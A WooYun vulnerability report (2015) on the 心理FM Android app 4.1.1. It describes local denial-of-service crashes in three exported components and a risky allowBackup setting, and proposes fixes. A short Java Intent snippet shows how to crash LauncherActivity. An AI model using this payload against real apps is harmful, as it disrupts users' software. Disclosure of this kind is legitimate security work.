漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0132682
漏洞标题:心理FM APP最新版4.1.1存在系统组件本地拒绝服务漏洞
相关厂商:xinli001.com
漏洞作者: 路人甲
提交时间:2015-08-08 23:09
修复时间:2015-08-13 23:10
公开时间:2015-08-13 23:10
漏洞类型:应用配置错误
危害等级:中
自评Rank:5
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-08: 细节已通知厂商并且等待厂商处理中
2015-08-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
心理FM APP最新版4.1.1存在系统组件本地拒绝服务漏洞
详细说明:
1.心理FM APP最新版4.1.1中的以下3个系统组件存在本地拒绝服务漏洞:
com.xinli.fm.activity.LauncherActivity
com.tencent.android.tpush.XGPushActivity
com.xinli.fm.receiver.DownloadReceiver
2.同时,app的manifest文件把android:allowBackup参数值为"true",
使得攻击者可以注入恶意的apk文件到备份文件中,造成静默安装程序,绕过权限确认弹窗。
漏洞证明:
1.com.xinli.fm.activity.LauncherActivity 利用代码片段如下:
Intent intent=new Intent();
intent.setComponent(new ComponentName("com.xinli.fm", "com.xinli.fm.activity.LauncherActivity"));
intent.putExtra("anykey",new AnySerializableClass());
startActivity(intent);
另外两个,com.tencent.android.tpush.XGPushActivity与com.xinli.fm.receiver.DownloadReceiver的利用代码与之类似
实测截图如下:
<img src="http://xiaofengsky.free.frhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/567ec5ab77cd535e65fa391e0612dd36.png" alt="app崩溃" />
<img src="http://xiaofengsky.free.frhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/baeb78ef4cca68ce3075a1f1174fd7a3.png" alt="logcat信息" />
2.app的manifest文件把android:allowBackup参数值为"true"
manifest文件截图如下:
<img src="http://xiaofengsky.free.frhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/dc2346326fbf41d98386560b6cd0afc2.png" alt="allowBackup值为true" />
修复方案:
1.注册的组件请严格校验输入参数,注意空值判定和类型转换判断,防止由于异常输入导致的应用崩溃
2.将android:allowBackup设置为false
如果厂商不知道如何修复,可以与我联系
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-08-13 23:10
厂商回复:
漏洞Rank:2 (WooYun评价)
最新状态:
暂无